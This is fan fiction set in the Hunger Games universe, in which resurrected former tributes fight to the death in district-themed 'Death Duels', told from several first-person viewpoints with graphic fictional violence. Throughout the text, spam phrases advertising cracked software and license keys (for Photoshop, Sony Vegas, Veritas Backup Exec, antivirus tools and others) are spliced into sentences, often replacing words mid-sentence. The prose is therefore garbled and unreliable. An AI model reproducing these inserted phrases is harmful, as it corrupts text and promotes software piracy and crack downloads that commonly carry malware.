I brace for another desperate dive when a figure lunges out from the diamond maze and grabs Kate from behind. I hear her squeal of panic as two thickly muscled arms wrap around her neck. She doesn't have time to use her knife before the arms give a sharp jerk and her neck snaps. She slides to the ground, dead.

Three more chimes go off as Elvis (300) stalks into the clearing. Instinctively, I look to the sky and the holographic scoreboard. The faces of Kate, Artemis, and Warwickite all dim at once, leaving only three more. Elvis, Karma, and myself.

"That was.most amusing," Karma rises from where Warwickite's body lies, stiff and unmoving. "He really knew how to fight. But still, he underestimated the power of one's fingers." He stretches his long fingers as he speaks and I grimace as I see the fresh blood that soaks them. Karma just smiles at me and pulls a sword out from a nearby crate. "Duel to the death? An honourable fight?" He asks, his voice dripping with mock politeness.

"No way. Two people can survive this Duel. Let's make it you and me. Let's just get him. He's unarmed!" I point towards Elvis, whose been watching our interaction with an emotionless face. Karma's crimson eyes flicker towards him and I see them light up when he sees I am right. Elvis has no weapons.

"Ah. I see. You wish to kill the weakling, avoid putting yourself at risk. Smart. Very smart." Karma sounds like a snake as he stops halfway between the two of us, his gaze flickering back and forth.

I shrug and pick up my fallen spear. "Seems like common sense, no? Why risk our own health when we could just team up and win unscathed?"

"Oh, you're clever. So very clever. But you see, I could never possibly bring myself to trust--"

His words turn into a brief scream of pain as my spear digs into his chest. He topples over and I race across the clearing, a wide grin on my face. "Of course you couldn't trust me! You already betrayed me once! No way was I letting it happen again, asshole!" I stomp on his face for emphasis, then a chime sounds. My spear pierced his heart, killed him instantly. Awesome.

"Coolio, man. Nice moves." Elvis comes walking towards me, applauding. His claps echo through the now deathly silent caverb. "Looks like you and me have something in common."

"Hmm?"

"We both really hate traitors!" He stops a few feet away from me and grins. After a moment I return it. I don't know this guy, but I already like him more than any allies I had in my first Games. I go to speak when trumpets interrupt and a voice I don't recognize speaks.

"Congratulations to the winners of the District 1 Death Duel! Elvis Alxexander and Cole Harrison! The two of you will join the pool of tributes competing in the 400th Annual Hunger Games!"

I grin like a fool as the voice fades and aan opening suddenly forms in the wall of the cavern. White suited people come pouring out and approach both me and Elvis. "We're the best District 1 has to offer," I tell him as the people begin to corrale us towards the opening that just formed. "And we should be the ones to lead the Careers!"

District 2 Death Duel

Teresa Silvers (325th Games)

When someone tells you that you've been asleep for over seventy-five years, you tend not to believe them. Except for when you consider that you've already died once and was somehow brought back to life. Then you'd believe anything they told you.

My room is empty and featureless, leaving absolutely no impression on me as I wait for this so-called "death duel" to begin. My mind is elsewhere anyways, focused on the family I once had. Are they dead now? Or just extremely old? I feel my stomach churn uncomfortably at either possibility. The fact that everyone I've ever known could be dead is.an unpleasant one. Very unpleasant.

I shuffle my feet around on the platform and try not to cry. Everyone I've ever loved is dead. Dead or an old, elderly person. What even awaits me back home? What would I return to? Is there even a point in winning these Games when I have nothing left? The only thing that I even feel slightly good about is the adobe photoshop crack reddit - Activators Patch that the man who was stalking me when I was Reaped so long ago is dead too. I mean, he has to be dead, doesn't he?

"Prepare for Duel commencement."

A voice seeps into my small room and tears me from my thoughts. Beneath me, the metal platform has begun to stir and move.

"The platform will now rise. Please stay in the center. Thank you."

There's no sound as the platform begins to rise. I hear nothing but the thudding of my heart as I enter a dark tunnel and then emerge into a brand new locale. I recognize the room, though I've never been in one myself. Hammers and anvils, vats of molten metal and steamy pots of water. A musty smell hang in the air, one that reeks of iron and sweat.

I'm in a smithy

I'm just looking around for a few seconds when I notice the platforms that have risen beside me. Four of them. I recognize Chloe from my Games and then there's tiny Onyx (302) and arrogant Bethany (300). And a lone boy. A sneer is etched on his face as he leers at me with a very disturbing face. "I'm gonna kill you first!" He growls at me. His voice is low and menacing, his amber eyes filled with an insatiable bloodlust. I instinctively take a step back and too late do I remember that I'll have my legs blown off.

But I don't.

I don't have time to ponder this discovery before the boy hurtles off of his platform and comes sprinting towards me. Behind him, the other girls begin to fight. I shouldn't have stopped to watch that.

The boy's shoulders ram into my gut and he takes me to the ground. The square of my back smacks into the cold, cobbled bricks below and I feel the breath shoot out of me as the boy howls to the sky. "I am Drewsiff Bloodwonky! I am the blood hound!" He balls his hands into fists and sends them barreling down towards me but I roll out of the way, hearing the crack of his knuckles as they smash into the hard bricks. He screams and cradles his hands close as I bring my feet to my chest and then kick him hard in the gut. He falls back and I'm on him, hands gripped around his head. A stream of curses flow out of his mouth as I smack his skull back into the ground. His eyes roll up into his head and I hear a sickenly loud crack.

I let go and slump backwards, panting heavily. I feel no pity for the boy. He was a cold-blooded murderer who got what he deserved. I'm just worried about myself.

The smithy is alive with the sounds of fighting. Screams of pain, shouts of anger and the occasional chiming of a bell fill the air. I smell the scent of blood lingering in the air. Already I see Onyx (302) lies dead on the floor. Chloe and Bethany still fight nearby though. I don't want anything to do with them.

As I crawl behind the tables and anvils that litter the room, I finally notice that hologram on the ceiling. The faces of Onyx, Damian, and Drewsiff are already blanked out. Only seven left.

Eager to get a look at the other tributes, I cautiously rise up from the ground and look across the table I'm hidden behind. The giant boy, Yuki (325) is squaring off with Pansy (301). The crimson girl keeps dancing away from his grasp and he's getting visibly upset at his inability to catch her.

I hear movement behind me but I don't have time to react. A hand clamps over my mouth and then a voice speaks directly into my ear. "Go to sleep."

Something sharp and metal cuts into my throat.

Pansy Costella (325th Games)

Yuki swings his massive fists towards me and I duck as his momentum sends his large frame barreling past me. He doesn't have a weapon, he doesn't need one. I've already seen how he killed my original District partner, Damian, with nothing but those fists of his. He's dangerous. "Stop moving!" He screams at me and once again sends a fist flying towards me. I roll sideways and avoid it.

"We both know I won't do that!" A grin forms on my face as he grunts and spins around much faster than I thought possible. He strikes me across the face with a massive backhand and I go sprawling to the floor, agony ripping through my jaw. Probably have a broken molar. Whiplash too. No time to think on it, Yuki stomps towards me and I roll, avoiding the deadly foot. "Just give up, you fat bastard!" I scream at him as I fall back towards the tables. I see a handled vat.

"Never!" He snarls and charges. I don't move.

Confusion crosses his face halfway towards me. He doesn't understand why I am not running, why I am not dodging. He soon learns why.

I smash my hand down onto the handle and the vat flies forward, spewing molten metal into Yuki's face and eyes. There's a delightful sizzling sound as Yuki stumbles backwards, howling and screaming as the metal burns his face and eyes. Pulling a long metal nail off of the table, I savagely kick Yuki in the knee, causing him to drop to my height.

He's still screaming. The metal has begun to merge with his face, a very painful looking thing. A smile crosses my face as I realize he's done for. "Shoulda just gave up!" I hoist the nail up and drive it into his chest, once, twice, thrice. His body gives one massive jerk and then he drops like a stone. Dead.

A chime goes off as I look away from the boy and observe the rest of the fighting. The Clarke siblings have Chloe cornered now. Johnny (300) holds a wicked hammer in his hands as the two of them approach sketchup downloads trapped girl.

"Looks like you have no weapons!" Bethany sneers at her. Chloe spits defiantly in he face. Bethany wipes it away and grins. "Oh, you shouldn't have done that!"

"Your death will be much more painful now!" Johnny agrees. The two of them step forward and then Johnny gives a half shout and falls to his knees. Bethany is screaming in shock as she sees the knife sticking out from his back. She didn't see what I did. Jeffrey (326) has slunk out from the shadows and is racing across the smithy, his knife in Johnny's back.

Bethany screams again as Jeff rips the knife back out from her brothers back. What an idiot. Jeff slashes the knife forward and her screams turn into gurgles as blood flows from a new gash in her throat. Jeff watches as she falls to the ground beside her dead brother. Two more chimes go off. Then a heavy metal hammer smashes in his skull.

He never saw it coming.

Jeff is dead on impact but Chloe continues to wail on his body, smashing it until he's an unrecognizable bloody mess. I position my fingers around the nail, ready to send it hurtling into Chloe's skull.

"Congratulations to the survivors of the District 2 Death Duel! Pansy Costella and Chloe Black!"

I hear the voice announce our victory. I just don't care. Chloe is still going to die. It'll just be one less opponent for me when the Games begin. I'm about to throw when a whistling noise pierces the air and my body is suddenly frozen. I can't move a muscle, everything is stiff as I feel an unknown energy pulsing through my body. Then the doors of the smithy open up and doctors pile in, followed by Peacekeepers.

They surround me and Chloe, who also appears to be frozen. One of the doctors stands in front of me. "You naughty little girl!" He waves a scolding finger at me as he grins. "Trying to get the drop on the competition? I'm afraid that just won't do." I try to tell him to go slag himself but I can't. So this immobility extends to my speech too. Swell. Just swell. The man turns to the others and barks out orders. "Get them out of here. They have a Hunger Games to compete in."

District 3 Death Duel

Noah Everest (300th Games)

I feel like I'm trapped back in that horrid cell as I nervously pace across my small room. Soon I'll be brought into an "arena" and be forced to fight with my fellow prisoners. Only two will survive. The rest must die.

I guess we should be grateful they're at least letting two of us live. I would have thought only one would survive.

"Prepare for Duel commencement."

I position myself in the exact center of the platform and wait as it slowly begins to rise. I wonder what our surroundings will be. They said it'd be something similar to our District export, so electronics, perhaps?

Yes. Yes, it's electronics. The platform rises into a command hub-like area. Giant, complex plasma monitors line the walls behind me and the other tributes. All of our platforms are placed in a circle around a ring of computers on a raised circle. Four stairways from each direction, north, south, east and west, lead up to the circle. In the center of the circle, I see a table. Laden with knives, wires and all sorts of electronic goodies.

Those will be our weapons.

The other tributes seem confused, dazzled by the lights of the plasma screens that show nothing but static. I'm the only one that has noticed there's no countdown. Nothing showing how long we have to stay on our platforms. Now, this can mean one of two things. Either they want someone to explode or there is no countdown.

I'm betting its the latter.

I've learned from my past mistakes. I lost the 300th Games and died because I ran from a fight, ran straight into a forcefield while fleeing. Well, this time I don't intend to run from the fighting. I'm going to run towards it.

The tributes near me don't even react as I hurtle off of the platform. They just watch as I pound up the stairs, heading for the table and weapons. I thought District 3 was supposed to be smart? I guess not. Maybe that's why we're all ef commander 19.04 - Crack Key For U instead of living a life of luxury in the Capitol.

I reach the top of the stairs and see that at least one other tribute has the same idea as me. Rebel Groots, the long haired emo kid from the 326th Games has just ascended the north staircase. We both stop to stare at one another and then lunge for the table.

He predictably grabs a knife, I grab the handle of a smooth black tazer. Within seconds he's slashing the knife at me. I dodge and then slide the switch on the taser from "Off" to "On", a small hum of electricity tells me that it's now active. Good.

Rebel swings for my head and I duck it, stepping forward to meet him. There's a flash of surprise in his eyes and then my taser pokes into his ribs.

There's a sharp crackling sound of electricity and then Rebel begins to convulse uncontrollably. Brilliant blue arcs of electricity race across his body, frying his innards. His eyes roll back into his head, his clothes smoke and sizzle and then he's falling to the floor.

The taser killed him within seconds.

There's no sense of grief, no loss. He wasn't a person. None of us are people. We lost our humanity back when we died in our Games. We lost our families, our friends and our dreams. We lost everything we cared about. Now we're just empty husks, husks with nothing to live for except life itself.

"Oh, God."

A small feminine voice brings notice to the other tributes. It seems all of them are here now, standing on the edge of the four stairwells, watching me. They all seem shocked, terrified even. One of the girls (Elecctronny from the 325th Games I think) is shaking. The rest watch me with fearful gazes. I have the best weapon. I have the taser. I have the means of dealing death here. That makes me the target.

"Are we gonna get him or what?" A small, impish girl sneers from the eastern stairs. Di Thorn. My District partner. Despite only being twelve years old she was a psychopath. Someone obsessed with killing and maiming. I wasn't surprised when she joined the Careers.

"Just try it, Di!" I position my body to face her and tighten my grip on the taser. "Let's finally see who'd win a fight between the two of us!"

A smirk crosses her khaki face. "I don't have to fight you."

The sound of his footsteps slapping on the smooth floor give him away. I turn just as he's grabbing a knife from the table. Elecc (325) has a short scream as my taser jabs him and then he's on the ground, shaking as errant streaks of white heat snake around him. I passively watch as the electricity ebbs away and leaves his prone body, smoking slightly. "Anyone else want to try their hand?" I ask, trying to keep my voice from shaking. I need to appear strong, unimpressed by their numbers. Or else I'll perish.

I spin around, gazing at the remaining six tributes. They don't answer me, their faces are stony and silent. Then one of then comes rushing towards me.

I hold my taser out but the boy slides to his knees and holds his hands together. "Please! Don't kill me! I'm with you, Noah! Two of us can live, just let me help you and we can win this together!" The boy looks up to me with pleading blue eyes hidden behind wired glasses. His beanie hat covers eximioussoft banner maker pro crack - Crack Key For U ruffled brown hair and I recognize him as the boy kept in the cell across from me, the one who always cried for his family. I can't kill him.

"Then get up!" With one hand I pull the boy to his feet. He flashes me a small smile and then grabs a knife off from the table with trembling fingers. The two of us face the others.

"Chip! We were allies in the Games!" A brunette girl shouts to my new ally. Beside her, Electronny cries silent tears. "Are you just going to abandon us now? Kill us even? Just so you can stay alive?"

Chip opens his mouth but doesn't speak. He's conflicted; He wants to help his friends but he also wants to live. And I give him the best chance of living. The girl waits for him to say something but he doesn't. He keeps his gaze fixed on the floor and I shake my head. "Are you saying you wouldn't kill him?" I challenge the girl, Vision (325). "That you'd rather kill Elecctronny then him?" I gesture at the small frightened girl beside her. "No? Then shut up and fight. People have to die. And it doesn't matter who--"

A heavy weight drops onto my shoulders, veritas backup exec 20.3 crack - Crack Key For U me to the floor. The taser slips from my fingers and slides across the floor as chaos breaks out. Vision and Elecctronny charge forward as another girl grabs Chip from behind. I go to help when I'm spun around and faced with the snarling vestige of Di. "Think you're some kind of visionary?" She growls as her fist strikes me access the face. "With your pretty speeches and making allies out of the downtrodden?" Her blows disorient and then her slender hands slip around my neck and pull me up. "Well, you're not. You're no visionary. You're just another forgettable kid!" She smashes my head into the keyboard for one of the computers. The keys clack as my head screams in agony as she repeats the process. She brings my head down for the fourth knock when I catch the side of the table with my hands. I throw an elbow into her ribs and she let's out an Oomph! of pain, giving me the opportunity to shove her away and dive across the floor.

I slide across to the other side, stopping right next to the taser. I hear Di shouting angrily and then I roll onto my back as she throws herself towards me. Unfortunately for her, she just lands on the business end of a tazer.

Spittle flies from her mouth as the electricity sparks her body. Her arms and legs kick out as she falls backwards, contorting unnaturally as she rolls and throbs. Then she goes still, dead at last.

I give myself only a few seconds to breathe easy and survey my surroundings. The chaos that had started just a moment ago has already created casualties. Elecctronny lies dead on the cold floor, her neck bent at an odd angle. Syren (302) is on top of Vision, squeezing a thin wire around her throat. I think it's barbed, because blood begins to flow from where the wire touches skin. And finally, Bethunia (301) is kicking and beating away at Chip as he lies on the floor, curled in a ball.

It's her who I attack first. I spring to my feet and jab Bethunia square in the back with the tazer. She goes down like the rest, kicking and convulsing. Nothing new here. Just another unnecessary death. "Are you okay?" I pull Chip to his feet and give him a thorough look over. His lip is bloodied and black bruises cover his face but nothing looks too serious or fatal.

"Y-yeah.I think." He coughs feebly and then, when he looks up, a flash of horror crosses his face. "Noah! Behind you!"

I'm tossed backwards to the floor. A foot stomps on my ribs and I hear a loud crack. Breathing becomes difficult and I see the face of Syren as she looks down on me. She was a Career recruit in her Games. Brutality is just second nature. She smiles and lifts her foot to crush my skull when a new expression forms. Confusion.

Her eyes glance downwards but she never sees what happened. Her knees buckle she collapses to the ground, I see the knife buried in her back and realized what happened.

Chip.

He doesn't even say anything to me. He just drops to the ground and curls back into a ball, sobbing and crying out for someone named Kinsey. Nothing else moves. All of the other tributes are dead, leaving us as the two survivors. "Congratulations to us," I mutter sarcastically and try to sit up. I can't. My ribs hurt too much so I'm forced to settle with leaning back against the computers.

The air is scented with blood and burnt flesh. Some of the dead tributes still smoke from the effects of the taser. I say no more and think of nothing as I sit in the room of death. Chip is still sobbing, but quietly now. I think he now calls for his parents. Poor boy.

I lean my head back and close my eyes, waiting for the moment when the Capitol will come for us and put me in the Hunger Games, where I will regrettably kill once more.

District 4 Death Duel

Trident Bekke (302nd Games)

I'm not nervous, I'm not concerned, and I'm definitely not frightened. One thing I am is excited. Excited for the possibility of living once sony vegas pro 15 crack - Activators Patch.

Being dead sucks. You don't do anything cool, you don't do anything at all! At least, what I remember of it. Which isn't anything. Which is kinda weird really. I remember being stabbed by that hot girl from District 7 and then I don't remember a thing until some Capitol dude wakes me up and claims to have resurrected me. Something is off about that. I don't know what, but something is. Feels like I'm missing something obvious.something--

"Prepare for Duel commencement."

I look up to the ceiling and flash one of my most charming smiles. "Okay, lady. Whatever you say. "Just make sure I get up there in one piece, ya know?"

The platform rises and next thing I know, I'm in the middle of some sort of ocean or whatever. Pure blue water surrounds me and in the distance a large rocky outcropping shines under a bright yellow sun. "Woah. That's bright!" I squint my eyes from the intense sunlight so it's several more seconds before I notice the beautiful girls that surround me.

There's four of them and they're all standing on platforms like me, meaning they're also tributes. Three of them are positioned to my right and the other is on my left. All of them look to the outcropping in the distance, which I can now see is surrounded by a stretch of sand and littered with tools used back in District 4. Nets, fishing hooks, tridents, bidents, harpoons, etcetera, etcetera. Boring stuff. I look to the girl to my left, a tan orange-haired hotty with green highlights and call out. "Hey, beautiful. You have anything goin' on tonight?"

She looks to me with a twinkling eye and cunning grin. "Oh, I don't know. I might be celebrating a few killings, nothing much."

I go to respond when another girl, a brunette and the hottest girl in this row of platforms, interrupts with a shout. "What the hell are they waiting for?! Get this started already!"

"Wow. You're a frisky one, ain't chu?"

The girl spins to face me, armed with a glare that would make most shiver in fear. I just smile and wink. "If you're so bored, you could entertain me. I really think--"

"She's moving! She's moving!"

The first girl I spoke to, Seafoam I think I remember her name from the brief info we were given, is shouting and pointing behind the brunette. Another girl, a creamy haired blonde, has stepped off her platform with a dazed look on her face. It sounds like she's speaking to herself.

"Gonna have to pass on that offer," The brunette cackles gleefully and jumps off her platform, splashing into the two foot deep water. "Because this game has just begun!" She sprints for the girl who moved, Nymph (325), and pairs her up. Then she strikes forward with a lightning quick bladejab and the girl goes falling to the water, her trachea almost assuredly broken from the force of that blow. "Wow. She really knows how to fight, eh?" I speak to Seafoam (326) before realizing that she has already gone sprinting for the outcropping. Dang, these girls really love to kill don't they? I like it. Makes them much more.interesting.

The fourth girl on the platforms, Kaylay from the 300th, goes charging Miss Kills-A-Lot in what has to be the worst idea in the history of forever. Kaylay throws a punch that's easily dodged and then Fressa, for that is her name, grabs her in a arm bar and jerks back, effectively breaking Kaylay's right arm.

The girl howls in pain and then Fressa just pulls her into a headlock and does what she did to the arm again. Only this time it's Kaylay's neck that breaks. "You're not very smart, are you?" Fressa drops the body and watches it float neck to Nymph's.

"You talking to me?" I smile coyly as she turns around. Her gorgeous brown eyes are filled with a bloodlust as she coldly regards me.

"Who else would I be speaking to, stupid? A fish?" She laughs scornfully and begins to approach me, which I actually find more exciting than terrifying. "You should have ran with Seafoam. Why didn't you?"

I shrug as if we're speaking about something trivial. "I just like watching hot girls kick ass."

"Well, you're gonna die now. I hope it was worth it!" She lunges for me but I hop our of her reach and wag a knowing finger.

"Ah, ah, ah! You should really get to that outcropping. Because if you don't, someone else will claim those weapons. Someone much bigger and stronger than me."

"You got lucky."

She turns and runs. Just like that. I watch as she sprints for the outcropping, marvelling her perfect form. I really hope she lives. I'd much rather her be my co-survivor so than some sweaty muscle-head.

Fressa Saltie (325th Games)

Already the others have reached the outcropping, already they've begun fighting. Wari (301) lies dead on the sand. I curse my own ineptitude. I should have killed Trident within seconds and then came here right away. Now I'm at a disadvantage.

At the outcropping, it's Wayne (325), the giant who had rejected the Careers invitation in his Games, who draws the most attention. He sits in the center of the sandy turf, a trident in each hand as he circles around to keep everyone in his field of view. No one wants to take the risk of being the first to charge him. No one is that stupid--

A boy suddenly darts forward, a harpoon in his hand. Foolishly he raises it to spear Wayne but he's given the boy far too much time to react. Cody doesn't even have time to strike before one of Wayne's tridents hits him in the chest and he goes tumbling into the sand. Moron.

But still, his charge didn't go to waste. Flick, the runner-up of the 300th Games and a boy who looks more like a man, sees that Wayne is distracted and chucks his own bident into the giants leg. As Wayne howls and drops to one knee, Flick charges forward, ducks under the giants swinging trident, and throws his entire body into him. They fall to the sandy floor and begin to brawl just as Giller, one of my allies from the 325th Games and about the only one I didn't betray, comes jogging up to the outcropping. I see my opportunity. "Giller! Finish off the winner of that brawl! I'll end Seafoam!" Always the obedient one, he nods and pulls the harpoon from the dead Cody's hands. I turn to face Seafoam with manic grin.

"Wait. What?" The daft girl doesn't understand what just happened and by the time she has even an inkling of it, I've tackled her to the ground and pried the fish hook she held so proudly from her hand. Her desperate eyes watch mine as I use the hook to slice her throat open.

She dies just like the rest. Her life bleeds out of her, smearing in the sand and being washed into the water, where it turns a pale pink. She was worthless. An easy kill.

"Fressa! Fressa! I need help, Fress--"

A wet gurgle cuts off Giller's screams and I turn to see Flick ripping the harpoon from his neck. Dark crimson blood stains his hands and I see Wayne lying stiffly on the sand. This guy is good.

"I intend to come out of here alive," Flick says as he faces me, twirling a trident with his deft fingers. "Will you let me?""

"Is that it? You're so frightened you won't win that you've resorted to begging?" I sneer at him, showing my utter contempt for everything he is. He shrugs modestly.

"Not really. I was just being a gentleman," He gives a dramatic sigh and then looks at me with a sly smile. "Guess I'll just have to kill you." Soundtoys 2021 Crack+ Activation And License Keys Free Download expecting him to throw the trident, so I'm taken back by his feint. He crosses the gap between us in a few seconds, his long legs giving him the advantage. I'm forced to duck and dodge to stay alive, no easy task. The tip of his trident catches me twice, once on the thigh and the other against my forearm. Both leave bleeding cuts.

"You're fast," He says when I duck under one of his ridiculously powerful thrusts.

"Or you're slow," He grins at my retort and thrusts again. This time I'm not quick enough to duck and I yelp in pain as the tip of my ear is sliced open. His grin widens.

"I'd say that you're fast. But maybe not fast enough."

He unleashes a flurry of strikes, I dodge them all until I step into the blunt end of the trident as he brings it forward. Flick follows up by smacking me in the crown of the head and then I'm sprawled on the ground, completely at his mercy. His eyes glint as he readies himself to finish me.

"Deus ex machina."

"Huh?" He doesn't pause as he brings the trident down where my head once was. But I've moved it just a few inches, prolonging my life for another moment.

"Deus ex machina," I repeat. "Deus ex machina is a plot device whereby a seemingly unsolvable problem is suddenly and abruptly resolved by the contrived and unexpected intervention of some new event, character, ability or object. And it's gonna happen right now."

The confusion on his face turns to fear as he spins around to face the person coming to my rescue. Only thing is, no one is coming to my rescue. When he sees no one in sight he spins back to face me but he already took the bait.

My foot smashes him between the legs and he cries and screams as he collapses. I don't waste time mounting him and slicing his throat with the same fish hook I used upon Seafoam. Deus ex machina indeed.

I stand and wipe my bloodstained hands on my shirt as I survey the outcropping. I've won. Everyone else is dead. I smile as the announcement confirms this. But the smile fades when it mentions the other survivor.

Trident Bekke.

"Hey toots, glad you took care of them all for me!" I see the boy as he comes jogging through the water, his blonde moppish hair bouncing along. A cold angry burns in my chest as I realize that I've been used. He sent me here to fight and kill his competition while he sat back and did nothing. Clever. Usually I'd appreciate such thinking, but not when it's used against me. "You're a real sweetheart, ya know?" A grin forms on Trident's face and I go to respond when I realize that I can no longer move. Shapes writhe in the distance, Peacekeepers or scientists sent to retrieve us. They must have immobilized me in case I was going to attack Trident. I wasn't. I have an entire Hunger Games ahead of me, full of opportunities for my revenge. I can wait a while longer.

I'm a patient person.

District 5 Death Duel

Sebastian Hive (325th Games)

I'm quite possibly the most prepared tribute in these Duels. I'm most assuredly the most prepared one from District 5. I've looked over the info cards they prepared for us countless times. I know my enemies weaknesses, their strengths, I know how they died, what their Games strategy was and how they failed in it. I know just about everything valuable about them.

And now I will kill them.

My platform rises, brings me into the duelling arena. Other tributes rest on their platforms beside me, their nervous eyes taking in the surroundings. We're on a long platform, the ground a see through mesh grid. Beneath us I can see the crackling electricity arcing across the ground. Behind me is a small concrete flooring in the back of the room. A large machine of sorts rests on it. I haven't the faintest idea what it is for.

But he does.

I see his plump red face, his body and it's rolls of fat, the glasses on his face and his messy red hair. Watt Powers, male tribute from the 301st Annual Hunger Games. Unlike the other tributes who've lined themselves up to face forward, he does the opposite. He stares at the machine with a delighted grin on his fat face, like he just got the most magnificent present for Christmas.

Very curious.

There is no gong, no signal that the competition has begun. One moment we're just standing there idly and the next a girl is rushing off of his platform. I recognize her face from the info cards. Allie Costigan from the 300th Annual Hunger Games. She's the first to realize there's no timer but the others follow suit. Soon they all go rushing for the center of the grid, away from platforms.

Except for Watt.

He watches the others run with a grin etched on his face and then he plops off of his platform and goes waddling for the machine. I simply must find out what is so special about it.

I follow the boy as he drops beside the machine and casually pries a panel off of it, revealing a mess of wires and electrical sockets. He goes to meddle with these when I grab him around the shoulder and he yelps in fear. "Don't kill me!" He screams pathetically without even turning around. "I can fry the others! You can win without even lifting a finger!"

Peculiar. "How so?" I ask the boy and he finally turns around. I grimace as I see his fat jowels flap about as he speaks.

"I--See the grid? The meshy wire like stuff?" He points at the ground that covers every inch of the room except for the small area where we stand.

"Of course I see it! Do you think I am daft, goodman?"

"No!" Terror lights his eyes as he thinks he has offended me. I can't hold back a laugh at how awestruck this little piggy is. "I would never! I wouldn't--"

"Cut to the chase. I have no time for this nonsense." Already I can hear the other tributes fighting. I hear their yells and screams. Curiously, there doesn't seem to be any provided weapons. They fight with their fists alone.

"Okay. Okay. Well, That mesh is used in the power plants back in District 5. Which this whole area is meant to resemble, obviously."

I nod. "Of course. I knew that right away." This is a lie. I've never stepped foot inside a plant, much less know what one looks like. But no point in making myself look inferior. "But what does this machine have to do with this?"

"I'm getting there. The mesh is used to channel electricity from either room to room or plant to plant. Vast amounts can travel through it without frying the wires, however the grid itself is very hazardous. One touch would kill you instantly. And that machine," He jerks a thumb at the metallic contraption behind us. "Is what generates the electricity. When turned on the entire gird will become alive with enough electricity to kill twelve elephants."

"Can you turn it on?" I ask download driver easy pro crack. The thought of being able to kill every single tribute in this room without having to do it manually is.enthralling, to say the least.

"Uh, hello?" The fatty pulls against my grip and I let go. "That's what I was doing before you stopped me! It'd already have been done and we could be sitting in a comfy room eating poptarts and."

"Get to work," I quickly interrupt him. "I'll watch your back and make sure you have enough time." He blinks in confusion and then I see that look again. He's still awestruck.

"Does this mean we're allies?" His voice is high with excitement.

"For now, yes. But get to work!" I give him a sharp shove and he nods with ecstasy as he turns to fiddle with the exposed wires. I watch the others as they fight, punching and kicking with all their strength. There's still no weapons and I now know why. This machine is meant to be our weapon. I suppose that the Gamemakers thought we'd all know what it did. They certainly wouldn't have anticipated that only the fatty would know it.

Thinking of the fatty, he would make an intriguing ally once we enter the Games. In my last Games I made one crucial mistake. I only recruited hardened killers and no one else. Mayhap I would have won, if I had been in the same arena as my allies, but nonetheless, I wound up dead on the jungle floor. I will not allow that to happen again.

Allana (325), one of my original allies, is in this Duel. She's punching and biting with the rest right now. She'll die when Fatty activates the machine. I do not care for her at all, she was a useless ally to me. And the only reason I keep allies is for their usefulness. "Nearly done!" Fatty calls over his shoulder as he continues to do something with the open panel. "Just a couple more moments!"

"You better hurry," I tell him grimly as a tribute suddenly comes straight towards us. "Because it looks like we have company."

It's not just a District 5 scrub who challenges me. It's Philo Ventus (326), the giant who stayed hidden for the entirety of his Games until the finale. He would have won if he hadn't been struck down from behind whilst finishing someone off.

"You looking for something?" I ask the giant with a polite nod of the head. Manners are crucial, even when dealing with a horrid beast like Philo. His eyes just flicker to Fatty and the machine, a peculiar look crossing his face. Veritas backup exec 20.3 crack - Crack Key For U it transforms into a glare. "Ah. I see that you understand what is happening!" I laugh lightly and step forward to block his path towards Fatty. "I did not expect a mangy mongrel like yourself to understand the principles of electricity. I would have thought that even simple fire would be too much for you."

His massive hands curl into fists at his side. He doesn't like to be insulted. Good. "They said you were a kind person, a gentle giant of sorts. Someone who innately disliked fighting. But I know the truth. It's not that you dislike fighting, you're just afraid of it. You're a bleeding heart coward!"

His nostrils flare and he steps even closer. "I don't like bullies."

A smile crosses my face. "And I don't like giant freaks who have no place in society."

His fist flies for me but I know it's coming. His initial blow misses and he tries with his left hand and this goes the same way. I was taught how to fight by the finest trainers in District 5, I've spent years learning the fine art of combat, understanding how my enemy works and how to avoid his attack. This ignoramus just throws punches as hard as he can without even the semblance of subtlety or planning. I could dodge him for days.

His attacks keep coming hard and fast but I continue to duck and weave past them. He's getting annoyed and grunts in exasperation with each missed strike. When I see an opening I step forward and deliver three quick jabs to his ribcage before bounding back again as his fists seek my head. He always misses.

The battle continues on like this. He attacks. I dodge. I counter his attack. He desperately tries to drop me. He fails. Repeat. I'm convinced that I don't even need Fatty's help when a massive fist comes for my head and I dodge out of the way. Straight into another fist.

It smacks me in the stomach and drops me to the ground. I groan and cough, feeling like I've just been hit by a truck. Philo stomps his boot down on my ankle and I scream as I feel the crack rip through my body. My first mistake was not seeing his feint. My second was not rolling when I had the chance.

"Seb! I got it!" Fatty jumps to his feet and waves frantically for me, screaming at the top of his lungs. "Hurry up and get on the concrete before the grid turns on!"

Philo's huge head turns to face him and that's when I raise my uninjured leg and kick him in the gut. Fatty screams for me as I begin to hobble towards the slab of concrete and the machine. I wish he would shut up. The other tributes are beginning to notice us and will soon figure out what he means by "the grid will turn on".

I'm almost there when I hear Philo running after me, his giant legs pounding against the mesh grid. Fatty clutches a switch on the machine and I scream for him to pull it when I dive for the concrete.

He pulls it.

I don't see the result but I hear it. The crackling sound of the machine turning on and then the simultaneous screams of the tributes as electricity tears through their bodies, Philo's included. It only lasts for a few seconds and then there's a mechanical whirring and the screaming stops. A pudgy hand pulls me up. "Ha ha! Look at em'! There all skeletons!" Fatty crows viciously as I stand on one good leg, grimacing when I see my twisted right ankle. I pray that Shield Antivirus Pro Crack Gamemakers will have it fixed before plopping me in the Games. "They all thought I was an easy kill! Well, guess they were all wrong, weren't they?" Fatty continues to boast about his accomplishments as I stare out at the grid. He wasn't lying when he said they were skeletons. The tributes who weren't as smart as we were lie dead, just a charred skeleton amid the ruins of a battlefield. That electricity was even stronger than I thought.

"Good job, Watt," I clap Fatty on the shoulder and give him a proud smile. "You showed them alright."

"Yeah! Yeah I did!" He's like a puppy. Give him praise and treats and in exchange he'll be loyal to you. He'd make a most excellent ally in the Games. "We make a great team!" He puffs out his pudgy chest and strikes a ridiculous pose. I tell him he looks quite heroic and he grins stupidly.

"Will you ally with me in the Games?" I ask him, knowing that PS4 Save Wizard Crack 1.0.7430.28765 + Serial Key Free Download 2021 answer won't be anything other than a resounding yes. His grin somehow widens even further.

"Yeah! Of course! We'll be like, the most unstoppable team ever! Everyone will fear us! I have the brain, you have everything else!"

I chuckle softly and clap him on the shoulder. Such a naive boy. Naive, but admirable. His intelligence is unparalleled but he has much to learn about everything else. Still, he is the best ally I could ever hope for. Someone who is undeniably loyal to me and yet is not a threat to me in the slightest.

The two of us will conquer the 400th Games.

District 6 Death Duel

Cosmo Fyngelli (300th Games)

I stand on the platform of a train station as the platform finishes its ascent. Behind me is a solid brick wall and there's two more platforms ahead of me, across two sets of train tracks. One of the platforms rests in between the two tracks and has a metal table laden with items. The other is on the far side of the station. I see five tributes on their platforms there.

Just like us.

